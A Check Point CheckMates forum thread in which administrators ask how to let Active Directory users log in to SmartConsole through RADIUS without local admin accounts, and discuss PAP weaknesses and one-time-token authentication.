Create a Post
cancel
Showing results for 
Search instead for 
Did you mean: 
Keld_Norman
Contributor

Check Point Radius Access to SmartConsole with no local user

Hi CheckMates,

I am looking in to Radius authentication of an AD user to allow login to SmartDashboard

Is it possible to give an AD user access to SmartDashboard using Radius without having to add it first in the -> manage & settings -> Permissions & administrators -> administrators ?

My wish is to have a group in Active Directory that I can add an AD user to and then he/she can login to the SmartDashboard.

If that is not possible and i HAVE TO use a local user - then I want to associate one checkpoint local user - it could be a user called radius_admin - to all users that try to login to the smart dashboard. If the user is approved in AD/Radius then the login is allowed - can this be done ? 

users

Best regards

Keld Norman

0 Kudos
8 Replies
Nüüül
Advisor

Hi,

Two years ago I tried similar thing on 77.20 and ended up with creating the users and authorize them with the built in groups. Password came from RADIUS

regarding this:

Security Management R80.20 Administration Guide 

it did not change. neither for TACACS or SecureID

Keld_Norman
Contributor

Thanks Daniel Meier Smiley Happy 

Was it for administrators to access the SmartDashboard you made that setup ? or for VPN or other services for users ?

By the way, a note about radius for SSH and WebGui access:

    I found that the setup in the webgui only supports PAP by default (also known as rfc1334) where credentials are transmitted from the Radius Client in plain text or rather .. it  XORs the password with an MD5 hash based on the shared secret and transmit that to the radius server.

(So I did not configure that to avoid creating a security risk and failing compliance checks.)

0 Kudos
Nüüül
Advisor

Hi,

I did it for authenticating Administrators. Ended up with SafeNet Token Authentication Smiley Happy

For VPN I either ended up with LDAP only, or using a Cisco ASA, as it is more flexible

Cheers

Daniel

0 Kudos
Darren_Fine
Collaborator

Hi guys,

 

Was researching using radius for Smartconsole logins and the security risk thereof.

Like you guys mentioned the PAP protocol seems to allow for the md5 hash to be cracked somewhat easily which would reveal the password so its a good idea to use a dynamic one time password.

So if that is the case - is it better to only auth with the one time password  ?

(I was originally going to use a <userstore password>+<1 time token> combination .. but if this can be viewed then surely its safer to just use the <1 time token> cause it wont be valid anymore) 

I hope the above makes sense 🙂

 

Regards

 

PS ..<the above Smartconsole issue doesnt seem to be a problem with vpns since the 1st factor is via the user store and the second auth via radius  can be just the 1 time token password - and this wont matter if it is decrypted since it wont be valid again>

 

0 Kudos
Alon_Alapi
Employee Alumnus
Employee Alumnus

Hi,

I have a customer RFE that will probably meet you requirements,

Please contact me offline (alonal@checkpoint.com) and we will take it from there.

 

Thanks,

Alon

0 Kudos
Michal_Gans
Contributor
Contributor

Hello,

 

is there any progress with RFE? Customer asked me for something similar.

 

Thanks

0 Kudos
Alon_Alapi
Employee Alumnus
Employee Alumnus

Hi,

I suggest to continue this discussion via email (alonal@checkpoint.com)

Thanks,

Alon

0 Kudos
spaceForceOne
Participant

Did you manage to get this working? (without creating individual administrator accounts on Check Point)

0 Kudos

Leaderboard

Epsum factorial non deposit quid pro quo hic escorol.

Upcoming Events

    CheckMates Events